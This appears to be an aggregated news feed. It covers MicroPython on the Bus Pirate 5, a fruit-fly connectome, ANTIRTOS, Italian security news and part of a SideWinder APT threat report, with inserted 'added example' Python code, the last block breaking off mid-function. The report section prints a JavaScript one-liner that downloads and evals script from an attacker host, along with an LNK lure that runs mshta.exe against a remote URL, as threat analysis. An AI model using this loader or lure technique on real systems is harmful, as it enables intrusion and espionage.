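MUX_SEL_LSB, MUX_SEL_WIDTH = 0, 4


def select_mux_channel(expander, channel):
    """Route one of 16 analog MUX inputs to the ADC without disturbing the other outputs."""
    expander.write_field(MUX_SEL_LSB, MUX_SEL_WIDTH, channel)
    return expander.read_field(MUX_SEL_LSB, MUX_SEL_WIDTH)


if __name__ == "__main__":
    exp = ShadowedOutputExpander(shift_out=lambda v: print(f"shift out 0b{v:08b}"))
    exp.set_bit(7, 1)
    select_mux_channel(exp, 5)
    print("shadow =", bin(exp.value))
```

Because every write goes through `_flush`, the `writes` list doubles as a trace of what the chip was told, which is the only way to reason about its state when debugging a board with no readback.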

[Ian], the father of the BP5 and indeed all Bus Pirates to date, did a great job in the documentation of explaining all these hardware sections of the design. The resulting power supply circuit is quite flexible. In brief, voltage and current control are done using PWM outputs, and actual voltage and current are sensed using the RP2040’s internal ADCs via the MUX. In addition, a programmable current limit threshold triggers a power supply shutdown, which can be overridden or reset as desired.

The Display


The BP5 uses a two inch IPS TFT LCD having 240×320 pixel resolution. It is controlled using a Sitronix ST7789 over SPI. Having driven similar setups before from MicroPython, this was pretty easy. At first I used the ST7789 library by Russ Hughes. The display was up and displaying text and running a few demo examples in short order.

The NAND Flash


Turning attention to the Micron MT29F1G01A 1 Gib (128 MiB) NAND flash next, I ran into some difficulty. [Peter Hinch]’s memory chip driver library seemed like a good start. But this chip isn’t on the list of already tested chips. I changed the scan function to recognize the Micron manufacturer ID byte codes, but after configuring the correct chip size, sector size, and block size parameters, it still didn’t work. After finally asking for help, [Mr Hinch] explained that my problem was the large 138 KiB block size of this chip. His library buffers one entire block, and 138 KiB is just too big for most microprocessors.

He pointed me to a non-buffered SPI block device driver by [Robert Hammelrath]. I tried this briefly, but gave up after a few hours because I was spending too much time on this chip. This is a solvable problem, but not strictly needed for the goals of this experimental project.

The Images


Speaking of wasting time, I spent way too much time on this part of the project. Not because it was necessary, but just because it was cool. My idea was a pong-like demo where an icon moves around the screen, rebounding off the screen edges. These LCD screen driver chips use a packed pixel format, RGB565. I found a tool on GitHub called rgb565-converter which converts PNG images to and from RGB565 format as C++ source. I forked and heavily modified this to generate Python code as well, and to add a 4-bit grayscale format. The animated GIF shows this in action.
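The RGB565 packing that the converter performs, as an added example that is neither the page’s code nor the rgb565-converter tool: it packs and unpacks RGB565 words, derives the 4-bit grayscale variant, serializes both in the byte order a panel like the ST7789 consumes, and emits a Python source fragment of the kind a converter would write out. The variable naming in the emitted module and the luma weights are my choices, not the tool’s.

```python
def rgb888_to_rgb565(r, g, b):
    """Pack 8-bit R, G, B into a 16-bit RGB565 word: 5 red, 6 green, 5 blue bits."""
    return ((r & 0xF8) << 8) | ((g & 0xFC) << 3) | (b >> 3)


def rgb565_to_rgb888(word):
    """Unpack RGB565 to 8-bit channels, replicating the high bits so full scale maps back to 255."""
    r5 = (word >> 11) & 0x1F
    g6 = (word >> 5) & 0x3F
    b5 = word & 0x1F
    return ((r5 << 3) | (r5 >> 2), (g6 << 2) | (g6 >> 4), (b5 << 3) | (b5 >> 2))


def rgb888_to_gray4(r, g, b):
    """4-bit grayscale (0..15) from integer Rec.601 luma weights; an assumed choice of weights."""
    return ((299 * r + 587 * g + 114 * b) // 1000) >> 4


def pack_rgb565(words):
    """Serialize RGB565 words big-endian, high byte first, as streamed to the panel over SPI."""
    out = bytearray()
    for word in words:
        out += bytes(((word >> 8) & 0xFF, word & 0xFF))
    return bytes(out)


def pack_gray4(levels):
    """Two 4-bit pixels per byte, first pixel in the high nibble; an odd trailing pixel is zero-padded."""
    out = bytearray()
    for i in range(0, len(levels), 2):
        hi = levels[i] & 0xF
        lo = levels[i + 1] & 0xF if i + 1 < len(levels) else 0
        out.append((hi << 4) | lo)
    return bytes(out)


def emit_python_module(name, width, height, rgb_pixels):
    """Render a Python source fragment holding both encodings of the image (hypothetical layout)."""
    words = [rgb888_to_rgb565(*px) for px in rgb_pixels]
    gray = [rgb888_to_gray4(*px) for px in rgb_pixels]
    return (
        f"{name}_WIDTH = {width}\n"
        f"{name}_HEIGHT = {height}\n"
        f'{name}_RGB565 = bytes.fromhex("{pack_rgb565(words).hex()}")\n'
        f'{name}_GRAY4 = bytes.fromhex("{pack_gray4(gray).hex()}")\n'
    )


if __name__ == "__main__":
    # Constructed 2x2 sample image: red, green / blue, white.
    sample = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 255)]
    print(emit_python_module("ICON", 2, 2, sample))
```

The round trip is lossy by design: `rgb565_to_rgb888(rgb888_to_rgb565(r, g, b))` only equals the input when the dropped low bits were zero, which is why the unpacker replicates high bits rather than shifting in zeros.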

The Wrapup


I enjoyed making this project, and learned a few more things about MicroPython along the way. I knew that the STM32 and the ESP8266 / ESP32 families had been supported by MicroPython almost since the beginning, and that the Pico RP2040 was a relative newcomer to the ecosystem. But I was surprised when I stumbled on this talk by founder [Damien George] about the history of the project at the 2023 PyCon Australia conference. He shows some statistics collected over 8 years of downloads broken down by microprocessor family. The RP2040 has been extremely popular since its introduction, quickly surpassing all other families.

MicroPython Monthly Downloads by MCU Family, provided by [Damien George]
This project presented a few frustrating issues, none of which would be showstoppers if this approach were to be developed further. I continue to be impressed by the number of people in the MicroPython community who have developed a wide variety of support libraries and continue to work on the project to this day.

Which raises the question: does the idea of MicroPython on the BusPirate even make sense? The existing C-based BusPirate firmware is now well established and works well for its intended purpose — quick explorations of an interface from the command line. Would an alternate MicroPython build benefit the community or just waste people’s limited development hours?

There could be some way to create a MicroPython implementation without duplicating a lot of code. The existing BP5 firmware could be treated as a library, and compiled with various C to MicroPython shim functions to create an extensively customized build. That is beyond my MicroPython experience for now, but it might be worth consideration.

Another way would be to just build a set of “big Python” classes to represent the BP5 on the desktop. This module would talk to the BP5 using the existing serial / USB port protocol, potentially requiring no firmware modifications at all. This seems like a good idea in general, since it allows users to easily script operations from the desktop using Python, and still retain the original capabilities of the BP5 in standalone operation.

The code for this project and associated documentation can be found here on GitHub. You can build your own binary if you want, but one is provided in the repo. And as [torwag] said back in March, you can just run the factory RP2040 MicroPython as well. In my testing, the only thing you’ll miss are the help messages.

If you want to learn more about MicroPython, visit their website and GitHub repository. Prebuilt binaries are available for many standard development boards, and the instructions on building it for a custom board are quite clear and easy to follow. I’ve heard rumors that Docker containers may be available soon, to make the building process even easier. Visit the Bus Pirate website and corresponding GitHub repository to learn more about the latest Bus Pirate 5 project. We have covered both projects over the years on Hackaday. Most recently [Tom Nardi] did an extensive hands-on writeup on the release of the Bus Pirate 5 back in February. Also [Arya Voronova] has written several articles on MicroPython, including this one on the eleventh anniversary of the MicroPython project. Do you use MicroPython in your projects, and what’s your take on the idea of using it with the Bus Pirate 5 board?


hackaday.com/2024/10/15/experi…



Artificial intelligence, data and gibberish: how far does our control extend?

Data and AI: I have talked about this a lot with @informapirata ⁂ :privacypride: and we agreed that the big problem is CONTROL over data.
My assistant blogger and I had fun looking up information about ourselves on GPT:
- Who is Elettrona? Nothing, it gives generic info. Who is Gifter? The same, some gibberish about "One Piece" that made the person concerned laugh quite a bit, and which he has been using for a long time now to explain the reason for the nickname to those not "in the know".
- Who are Elettrona and Gifter? The same generic answer.
Things change, though, if you type "is there information about Elettrona and Gifter on the internet?"
The (CORRECT) answer is the following:
****
"Elettrona" and "Gifter" are the pseudonyms of **Elena** and **Alessandro**, two bloggers who run the site *PlusBrothers*. The blog covers topics related to HIV, social stigma and their personal experiences.

- **Elettrona** is the name chosen by Elena, who is blind and has long experience in digital accessibility and inclusivity. The nickname "Elettrona" is a feminine, ironic version of "elettrone" (electron), reflecting her energetic personality and her interest in technology.

- **Gifter**, on the other hand, is the nickname of Alessandro, who lives with HIV. The name comes from the "gift giver" subculture, linked to the transmission of HIV, a provocative subject they chose to tackle in order to challenge prejudice and raise public awareness.

Together, they use their blog to fight HIV-related stigma and promote inclusivity through irony and personal storytelling.
****
Absolutely accurate data taken from our sources, our @PlusBrothers but also an article I wrote on HeroPress, another public site. And that is absolutely fine with me/us.
But what if tomorrow morning Gifter wakes up, shouts "EXPELLIARMUS!" in front of the mirror, and the next tests come back HIV negative? What if I shout "LUMOS" and can see, then Gifter shouts "NOX" at me and I can't see again? And to get my revenge I shout "AVADA KEDAVRA" to kill him, but all I get is that he becomes HIV positive again while I stay negative because I'm protected by "PROTEGO"?

Or the other way round, he is protected by "protego" and I become positive instead of him when he wakes up and says expelliarmus?
Fine, I'm talking about impossible things to be ironic, but the joke is meant to show that any situation can change from one day to the next for people, and those people have no control over how and where to update their information, let alone verify that they were the ones who published it.
Absurdly, someone could train the bot by writing that Alessandro transmitted HIV to me, making up a fake to hurt us. And we couldn't do anything about it, because whoever trains the bot can pretend to be me or Alex whenever they want.
I'm not against AI and I use it, but the weaknesses are many and awareness is a must.
#ironia #burla #EticaDigitale #AI #satira




Mapping a Fruit Fly’s Brain with Crowdsourced Research


Example of a graph representation of one identified network with connections coded by neurotransmitter types. (Credit: Amy Sterling, Murthy and Seung Labs, Princeton University)
Compared to the human brain, a fruit fly (Drosophila melanogaster) brain is positively minuscule, not only in sheer volume, but also with a mere 140,000 or so neurons and 50 million synapses. Despite this relative simplicity, figuring out how the brain of such a tiny fly works is still an ongoing process. Recently a big leap forward was made thanks to crowdsourced research, resulting in the FlyWire connectome map. Starting with high-resolution electron microscope data, the connections between the individual neurons (the connectome) were painstakingly pieced together, also using computer algorithms, but with validation by a large group of human volunteers using a game-like platform called EyeWire to perform said validation.

This work also includes identifying cell types, with over 8,000 different cell types identified. Within the full connectome subcircuits were identified, as part of an effort to create an ‘effectome’, i.e. a functional model of the physical circuits. With the finished adult female fruit fly connectome in hand, groups of researchers can now use it to make predictions and put these circuits alongside experimental contexts to connect activity in specific parts of the connectome to specific behavior of these flies.

Perhaps most interesting is how creating a game-like environment made the tedious work of reverse-engineering the brain wiring into something that the average person could help with, drastically cutting back the time required to create this connectome. Perhaps crowdsourced research can also help with the ongoing effort to map the human brain, even if that ups the scale of the dataset by many factors. In the meantime, even comprehending a fruit fly’s brain may give us many hints that could speed up understanding the human brain.

Featured image: “Drosophila Melanogaster Proboscis” by [Sanjay Acharya]


hackaday.com/2024/10/15/mappin…



Unhackable phones and computers for Donald Trump! Hackers accept the challenge!


Ahead of the US presidential election, Donald Trump’s campaign has strengthened its cybersecurity measures, equipping his team with the latest anti-hacker protection technologies. The main equipment supplier was Green Hills Software, known for its military products. After a recent incident in which Iranian hackers stole emails and data from his headquarters, Trump decided to do everything possible to prevent it from happening again.

Green Hills supplied the Trump team with “unhackable” phones and computers based on the Integrity-178B operating system, used on military aircraft such as the B-2 stealth bomber and the F-22 and F-35 fighters. This operating system is one of the few certified at Evaluation Assurance Level 6, which makes it practically invulnerable to cyberattacks. The company claims to have minimised all possible vulnerabilities by reducing the system code to 10,000 lines.

Dan O’Dowd, CEO of Green Hills Software, stated that the company’s employees constantly conduct thorough testing of the operating system and often fail to identify a single bug or weak point. The company has already offered its services to the team of Kamala Harris, the other contender for the US presidency.

Green Hills’ equipment also promises protection against modern cyber-spyware programs, such as the infamous Pegasus from the NSO Group. However, such claims attract interest not only from customers but also from hackers, for whom this becomes something of a challenge. Despite the big promises, experts are sceptical that any program can be completely protected from attacks.

Ahead of the election, Green Hills plans to offer its technology to protect election systems. O’Dowd stresses the importance of strong election security, comparing it to the security of nuclear systems, and believes election security should be at the same level.

However, despite all the efforts, the security of election systems remains in question, and it will soon become clear whether Green Hills’ hardware and software live up to the expectations placed on them.

The article Unhackable phones and computers for Donald Trump! Hackers accept the challenge! comes from il blog della sicurezza informatica.




Secure, geo-distributed cloud storage: Eurosystem chooses Cubbit for a resilient future


Bologna, Italy – 15 October 2024 – Thanks to DS3, the cloud object storage from Cubbit, the first enabler of geo-distributed cloud storage, Eurosystem SpA, an Italian system integrator with over 40 years of experience in the IT sector, has recorded a 580% increase in revenue from storage services. Eurosystem SpA aims to manage one petabyte of its customers’ data through Cubbit’s cloud by the end of 2025 and, thanks to the collaboration with the Bologna-based scale-up, is now able to generate new revenue streams, win strategic vertical markets and retain its customers by offering S3 cloud storage with an unmatched level of data sovereignty and resilience, which also allows cost optimisation and the choice of the geographic location of the stored data.

With more than 40 years of experience in technology solutions and cybersecurity, Eurosystem SpA supports over 800 B2B customers in Italy, particularly in the north, with customised deployments, training and ongoing support. The company addresses vertical markets and sectors that require advanced security and low-cost data storage, including manufacturing, sport, telecommunications and media.

Cyber threats such as ransomware attacks are increasingly sophisticated today and target vulnerabilities, both client-side and server-side, with unprecedented precision. Eurosystem SpA was looking for a definitive storage solution to protect its customers’ data that was compatible with Veeam, a key requirement since most of Eurosystem’s customers rely on this backup client.

Over the years, the company considered various S3 storage solutions, both cloud and on-premises. The former were easy to deploy and manage, but did not offer an adequate level of assurance in terms of security, compliance with data-localisation regulations, and predictability of bandwidth (egress), deletion and bucket-replication costs. On-premises storage offerings, on the other hand, provided sovereignty and regulatory compliance but proved very expensive in terms of hardware, licences, renting or buying physical premises, and IT staff dedicated to deploying, installing and maintaining the solution. Moreover, with on-premises storage, scaling storage capacity had to be done manually, adding further cost and time. Therefore, the investment required to set up redundancy across multiple geographic sites manually was higher with the other solutions.

By adopting Cubbit’s technology, Eurosystem SpA has instead been able to benefit from the advantages of both traditional cloud services and on-premises solutions, while mitigating the problems associated with each of these two storage models taken separately. Cubbit DS3 has a fixed unit cost for the storage service that includes all the main S3 APIs, together with geo-distribution capability, providing a cloud storage solution with data durability of up to 15 nines. Thanks to Cubbit’s geo-distributed technology, Eurosystem SpA can protect data from cyber threats both on the client side (object lock, versioning, IAM policies) and on the server side (geo-distribution, encryption).

Leveraging Cubbit’s GDPR compliance and data geo-fencing features, Eurosystem SpA is now able to comply with regional regulations and the stricter laws affecting the sectors in which its customers operate, allowing the system integrator to create new revenue streams, advantages usually associated with on-premises solutions. With the deployment of Cubbit’s solution, scaling of storage capacity and maintenance are handled automatically within minutes, with no need for upfront investment or dedicated IT staff.

Nicola Bosello, board member and Sales Director of Eurosystem, says: “We searched for a long time for a definitive, off-site S3 storage solution that would not require investing in expensive, complex infrastructure and that would comply with key requirements such as the GDPR. We have been offering Cubbit to our customers for a year, receiving positive feedback on Cubbit’s data-localisation capabilities and its ability to remain compliant with regulations, as well as its flexibility, speed of deployment, ease of scaling storage space within hours, and affordable pricing with no hidden costs. With Cubbit we have already won new customers and increased retention, significantly raising the level of cyber-resilience of our portfolio.”

Alessandro Cillario, Co-CEO and Co-founder of Cubbit, concludes: “Companies around the world are grappling with the daunting challenge of managing the explosive growth of unstructured data. They need a solution that fits their internal policies and IT strategies while keeping full control over their data. European organisations in particular face a range of challenges: from cyber threats to data-sovereignty issues and unpredictable costs. Eurosystem, with Cubbit as a true enabling player, can now offer its customers a level of cyber-resilience, sovereignty and cost efficiency never achieved before. We are excited to have Eurosystem as a solid partner in promoting our solutions.”

The article Secure, geo-distributed cloud storage: Eurosystem chooses Cubbit for a resilient future comes from il blog della sicurezza informatica.



Italy will have its land-defence hub: the joint venture between Leonardo and Rheinmetall is a reality

@Notizie dall'Italia e dal mondo

[quote]After the signing of the Memorandum of Understanding in June and yesterday’s announcement by Roberto Cingolani, CEO of Leonardo, the agreement between the two champions of the European defence industry has been made official. The joint venture between Leonardo and



Breaking News: 2024 Supercon SAO Contest Deadline Extended



More than a couple of folks have written us saying that their entries into the Supercon Add-On Contest got caught up in the Chinese fall holidays. Add to that our tendency to wait until the last minute, and there are still more projects out there that we’d like to see. So we’re extending the deadline one more week, until October 22nd.
AND!XOR Doom SAO from years past.
If you’re just tuning in now, well, you’ve got some catching up to do. Supercon Add-Ons are another step forward in the tradition of renaming the original SAO. One of our favorite resources on the subject comes from prolific SAO designer [Twinkle Twinkie], and you can even download PCB footprints over there on Hackaday.io.

Don’t know why you want to make an SAO? Even if you’re not coming to Supercon this year? Well, our own [Tom Nardi] describes it as a low barrier to entry, full-stack hardware design and production tutorial. Plus, you’ll have something to trade with like-minded hardware nerds at the next con you attend.

We’ve already seen some killer artistic entries, but we want to see yours! We know the time’s tight, but you can still get in a last minute board run if you get started today. And those of you who are sitting at home waiting for boards to arrive, wipe that sweat from your brow. We’ll catch up with you next Tuesday!

2024 Hackaday Supercon SAO Contest


hackaday.com/2024/10/15/breaki…



Help, my boss is an AI! [Promoted content]


There is no doubt that AI is rapidly reshaping the world of work. From suspiciously worded emails to new tools that integrate new AI-powered features, if you are a worker, there’s a high chance that you are already interacting with AI tools regularly.


euractiv.com/section/artificia…



TOR users at risk! The new Mozilla Firefox exploit could compromise anonymity


It has emerged that CVE-2024-9680, the vulnerability fixed last week in Firefox, could be used against Tor Browser users.

Recall that the problem was discovered by ESET specialist Damien Schaeffer and was a use-after-free in animation timelines. Animation timelines are part of Firefox’s Web Animations API, and this mechanism is responsible for managing and synchronising animations across web pages.

The developers released emergency patches and warned that, through this vulnerability, an attacker could execute arbitrary code while working with content. At the time, no detailed information was provided either on the bug itself or on the attacks in which it was used.

The issue was fixed in the following browser versions: Firefox 131.0.2, Firefox ESR 115.16.1 and Firefox ESR 128.3.1. As Mozilla stated, ESET specialists provided them with an exploit for CVE-2024-9680 that had been used by hackers in real-world attacks.

“The sample sent to us by ESET contained a full exploit chain that allowed remote code execution on the user’s computer,” the developers write. Mozilla assembled a team to reverse-engineer the exploit and understand how it works, after which it prepared an emergency patch within a day. Representatives of the organisation stress that they will continue to analyse the exploit to develop further protective measures for Firefox.

Almost at the same time, Tor developers reported that, according to Mozilla, this vulnerability had been actively used in attacks against Tor Browser users. “By exploiting this vulnerability, an attacker could take control of Tor Browser, but most likely would not be able to de-anonymise the user in Tails,” the statement reads.

However, the project’s blog post was later edited, and the Tor Project clarified that it has no evidence that Tor Browser users were intentionally targeted with CVE-2024-9680. Nevertheless, the bug did affect Tor Browser, which is based on Firefox, and the developers point out that the issue was fixed in Tor Browser 13.5.7, 13.5.8 (for Android) and 14.0a9.

The article TOR users at risk! The new Mozilla Firefox exploit could compromise anonymity comes from il blog della sicurezza informatica.



MUSIC FOR PEACE: “They have been blocking 80 tonnes of aid for Gaza for months”


@Notizie dall'Italia e dal mondo
These are non-perishable food, medicines and medical supplies, worth a total of about 800,000 euros. Since 20 June they have been stuck in Genoa due to bureaucratic delays and Israeli restrictions on humanitarian convoys
The article MUSIC FOR PEACE: “They have been blocking




ANTIRTOS: No RTOS Needed



Embedded programming is a tricky task that looks straightforward to the uninitiated, but those with a few decades of experience know differently. Getting what you want to work predictably or even fit into the target can be challenging. When you get to a certain level of complexity, breaking code down into multiple tasks can become necessary, and then most of us will reach for a real-time operating system (RTOS), and the real fun begins. [Aleksei Tertychnyi] clearly understands such issues but instead came up with an alternative they call ANTIRTOS.

The idea behind the project is not to use an RTOS at all but to manage tasks deterministically by utilizing multiple queues of function pointers. The work results in an ultra-lightweight task management library targeting embedded platforms, whether Arduino-based or otherwise. It’s pure C++, so it generally doesn’t matter. The emphasis is on rapid interrupt response, which is, we know, critical to a good embedded design. Implemented as a single header file that is less than 350 lines long, it is not hard to understand (provided you know C++ templates!) and easy to extend to add needed features as they arise. A small code base also makes debugging easier. A vital point of the project is the management of delay routines. Instead of a plain delay(), you write a custom version that executes your short execution task queue, so no time is wasted. Of course, you have to plan how the tasks are grouped and scheduled and all the data flow issues, but that’s all the stuff you’d be doing anyway.
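The two mechanisms described above, a queue of function pointers that an interrupt handler only appends to, and a delay() replacement that drains the queue while it waits, modelled in Python as an added example. This is not ANTIRTOS itself (that is a C++ header); the class and function names, the injected clock, and the fixed capacity with a dropped-job counter are my assumptions for illustration.

```python
from collections import deque


class FunctionQueue:
    """FIFO of (callable, args) pairs: an interrupt handler only enqueues, the main loop executes.

    Added example modelling the ANTIRTOS idea; not the library's own code.
    """

    def __init__(self, capacity):
        self._q = deque()
        self.capacity = capacity
        self.dropped = 0          # pushes refused because the queue was full (visible, not silent)

    def push(self, fn, *args):
        """Cheap enough to call from an ISR: nothing executes here, only a record of work is kept."""
        if len(self._q) >= self.capacity:
            self.dropped += 1
            return False
        self._q.append((fn, args))
        return True

    def pull(self):
        """Run exactly one queued job in the caller's context; returns False if nothing was pending."""
        if not self._q:
            return False
        fn, args = self._q.popleft()
        fn(*args)
        return True

    def __len__(self):
        return len(self._q)


def delay_with_queue(duration, queue, clock, idle=lambda: None):
    """Replacement for a blocking delay(): drain `queue` while waiting for `duration` ticks.

    `clock` is injected (a callable returning the current tick count) so behaviour is
    deterministic in tests; on hardware it would be something like time.ticks_ms.
    Returns the number of ticks actually elapsed.
    """
    start = clock()
    while clock() - start < duration:
        if not queue.pull():      # nothing pending: call the idle hook instead of spinning
            idle()
    return clock() - start


if __name__ == "__main__":
    import time

    log = []
    q = FunctionQueue(capacity=4)
    # Stand-in for an ISR: it just records the event and returns immediately.
    q.push(log.append, "button pressed")
    q.push(log.append, "uart byte ready")
    delay_with_queue(0.01, q, time.monotonic, idle=lambda: time.sleep(0.001))
    print(log, "dropped:", q.dropped)
```

Because `pull` runs at most one job per call, a long-running queued task delays the others but never the interrupt handlers, which only ever touch `push`; that is the deterministic behaviour the approach trades the RTOS for.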

The GitHub project page has some clear examples and is the place to grab that header file to try it yourself. When you really need an RTOS, you have a lot of choices, mostly costing money, but here’s our guide to two popular open source projects: FreeRTOS and ChibiOS. Sometimes, an RTOS isn’t enough, so we design our own full OS from scratch — sort of.


hackaday.com/2024/10/15/antirt…




Unlawful: the trade agreements between the EU and Morocco for products of Saharawi origin


@Notizie dall'Italia e dal mondo
The historic ruling of the Court of Justice of the European Union represents a condemnation of the policy of exploiting the fishing and agricultural resources of the territories of Western Sahara
The article Unlawful: the trade agreements



The emperor of the sky’s new clothes. Here is the new version of the B-52

@Notizie dall'Italia e dal mondo

[quote]Since 1955 the gargantuan B-52 strategic bomber, developed and produced by Boeing, has been the symbol of American military power. A fundamental component of the nuclear triad, but also a platform used for dropping both “dumb bombs” and



Beyond the Surface: the evolution and expansion of the SideWinder APT group



SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.

Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, here, here and here), the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.

Despite years of observation and study, knowledge of their post-compromise activities remains limited.

During our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities. The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.

SideWinder’s most recent campaign schema

Infection vectors


The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.

The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL: nasc.org.np/news/closing-cerem…

Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”

The contents of the file are selected specifically for the target and changed depending on the target’s country.

All the documents use the remote template injection technique to download an RTF file that is stored on a remote server controlled by the attacker.

RTF exploit


RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.

The attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available in the “mshtml.dll” Windows library.

The shellcode uses different tricks to avoid sandboxes and complicate analysis.

  • It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates execution.
  • It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.
  • It attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.

The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip them and jump to valid instructions during execution, to make analysis more difficult.

The strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.

The first argument is passed with the standard push instruction, which loads the library address to the stack. The second argument is passed indirectly using a CALL instruction.

Passing necessary arguments

The loaded functions are then used to perform the following actions:

  1. Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.
  2. Get a pointer to the current command line using the “GetCommandLineW” function.
  3. Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the key.
  4. Overwrite the current process command line with the decoded JavaScript.
  5. Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.

The loaded JavaScript downloads and executes additional script code from a remote website.
javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\",\"hxxps://mofa-gov-sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")

Initial infection LNK


During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.

The archive usually contains an LNK file with the same name as the archive. For example:

| ZIP filename | LNK filename |
|---|---|
| moavineen-e-hujjaj hajj-2024.zip | MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk |
| NIMA Invitation.zip | NIMA Invitation.doc.lnk |
| Special Envoy Speech at NCA.zip | Special Envoy Speech at NCA.jpg .lnk |
| දින සංශෝධන කර ගැනිම.zip (Amending dates) | දින සංශෝධන කර ගැනිම .lnk |
| offer letter.zip | offer letter.docx.lnk |

The LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.

Below are the configuration values extracted from one of these LNK files:
Local Base Path : C:\Windows\System32\sshtw.png
Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx
Relative Path : ..\..\..\Windows\System32\calca.exe
Link Target: C:\Windows\System32\mshta.exe
Working Directory : C:\Windows\System32
Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"
Icon File Name : %systemroot%\System32\moricons.dll
Machine ID : desktop-84bs21b
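A triage helper for LNK lures of the kind dumped above, as an added example that is not part of the report or of any tool it names. It walks the Shell Link header and StringData section (MS-SHLLINK), skips the LinkTargetIDList and LinkInfo structures rather than decoding them, and flags a document-looking name paired with a remote URL in the arguments; the sample LNK it builds is constructed, with a placeholder host instead of the real one.

```python
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields come in this fixed order, each present only if its flag is set;
# the labels match the dump above
STRING_FIELDS = (
    ("Description", HAS_NAME),
    ("Relative Path", HAS_RELATIVE_PATH),
    ("Working Directory", HAS_WORKING_DIR),
    ("Command Line Arguments", HAS_ARGUMENTS),
    ("Icon File Name", HAS_ICON_LOCATION),
)
DOC_EXTENSIONS = (".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg")


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file. LinkTargetIDList and LinkInfo
    (where the real target, mshta.exe in the dump, lives) are skipped, not decoded."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]  # after HeaderSize(4) + LinkCLSID(16)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # uint16 IDListSize, then the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # uint32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def looks_like_remote_hta_lure(fields: dict) -> bool:
    """The pattern in this section: a document-looking name while the arguments
    hand the target a remote URL (mshta.exe accepts one directly)."""
    args = fields.get("Command Line Arguments", "").lower()
    name = fields.get("Description", "").lower()
    return name.endswith(DOC_EXTENSIONS) and ("http://" in args or "https://" in args)


def _string_data(text: str) -> bytes:
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk(with_idlist: bool = False) -> bytes:
    """Constructed LNK mirroring the dumped fields; the URL host is a placeholder.
    with_idlist adds one dummy 16-byte item so the IDList skip is exercised."""
    flags = (HAS_NAME | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
             | HAS_ICON_LOCATION | IS_UNICODE)
    if with_idlist:
        flags |= HAS_LINK_TARGET_ID_LIST
    header = struct.pack("<I", 0x4C) + bytes(16) + struct.pack("<I", flags)
    header += bytes(0x4C - len(header))  # attributes, timestamps, sizes left zeroed
    body = header
    if with_idlist:
        item = struct.pack("<H", 18) + bytes(16)  # one ItemID, 18 bytes including its size
        body += struct.pack("<H", len(item) + 2) + item + b"\x00\x00"  # IDListSize + TerminalID
    return (body
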